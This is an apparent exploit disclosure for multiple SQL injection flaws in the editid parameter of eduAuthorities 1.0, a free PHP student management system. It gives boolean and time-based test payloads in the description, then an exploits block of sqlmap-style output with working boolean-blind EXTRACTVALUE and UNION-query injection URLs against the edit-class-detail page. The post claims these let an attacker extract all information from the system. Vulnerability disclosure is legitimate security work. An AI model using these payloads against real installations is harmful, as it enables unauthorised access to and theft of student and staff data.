## Titles: eduAuthorities-1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 07/29/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The editid parameter appears to be vulnerable to SQL injection attacks. The payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each submitted in the editid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Additionally, the payload (select*from(select(sleep(20)))a) was submitted in the editid parameter. The application took 20011 milliseconds to respond to the request, compared with 3 milliseconds for the original request, indicating that the injected SQL command caused a time delay.The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Exploits: - SQLi Multiple: ```mysql --- Parameter: #1* (URI) Type: boolean-based blind Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488 OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)# UiVZfrom(select(sleep(3)))a) Type: UNION query Title: MySQL UNION query (random number) - 3 columns Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962 UNION ALL SELECT 8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a) --- ``` ## Reproduce: [href](https://www.patreon.com/posts/eduauthorities-1-109562178) ## More: [href]( https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html) ## Time spent: 00:37:00